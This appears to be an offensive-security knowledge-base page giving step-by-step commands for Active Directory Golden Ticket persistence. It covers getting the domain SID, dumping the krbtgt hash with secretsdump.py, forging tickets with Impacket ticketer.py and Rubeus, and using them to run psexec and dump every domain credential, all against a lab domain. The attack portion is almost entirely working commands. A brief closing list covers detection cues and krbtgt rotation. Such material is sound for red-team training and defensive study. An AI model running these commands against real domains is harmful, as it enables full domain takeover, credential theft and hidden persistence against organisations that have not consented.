Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Persistence / Techniques

Golden Ticket

Golden Ticket persistence uses the krbtgt key to forge Ticket Granting Tickets. If we have the krbtgt NT hash or AES key and the domain SID, we can create TGTs for arbitrary users and groups without knowing those users' passwords.

Variables

export DOMAIN=ootw.local
export DC=10.10.10.200
export SID='S-1-5-21-1111111111-2222222222-3333333333'

Get domain SID

lookupsid.py "ootw.local/student:student@10.10.10.200" 0
nxc ldap 10.10.10.200 -u student -p 'student' --get-sid

Dump krbtgt

secretsdump.py -just-dc-user krbtgt "ootw.local/Administrator:Password123!@10.10.10.200"

Forge with Impacket

ticketer.py -nthash KRBTGT_NTLM -domain-sid "$SID" -domain "$DOMAIN" Administrator
export KRB5CCNAME=Administrator.ccache
klist

Use forged TGT

psexec.py -k -no-pass "$DOMAIN/Administrator@dc01.$DOMAIN" -dc-ip $DC
secretsdump.py -k -no-pass "$DOMAIN/Administrator@dc01.$DOMAIN" -dc-ip $DC -just-dc

Forge with Rubeus

Rubeus.exe golden /rc4:KRBTGT_NTLM /user:Administrator /domain:ootw.local /sid:S-1-5-21-1111111111-2222222222-3333333333 /ptt

AES option

Rubeus.exe golden /aes256:KRBTGT_AES256 /user:Administrator /domain:ootw.local /sid:S-1-5-21-1111111111-2222222222-3333333333 /ptt

Convert kirbi to ccache

minikerberos-kirbi2ccache golden.kirbi golden.ccache
export KRB5CCNAME=golden.ccache
klist

Notes

  • Golden Tickets are domain-wide because krbtgt signs TGTs.
  • The forged user does not have to exist, but using a real user often blends better.
  • Modern detection looks at impossible lifetimes, strange group SIDs, missing account correlation, encryption type anomalies, and unusual service access.
  • Killing Golden Ticket persistence requires rotating krbtgt twice after replication is healthy.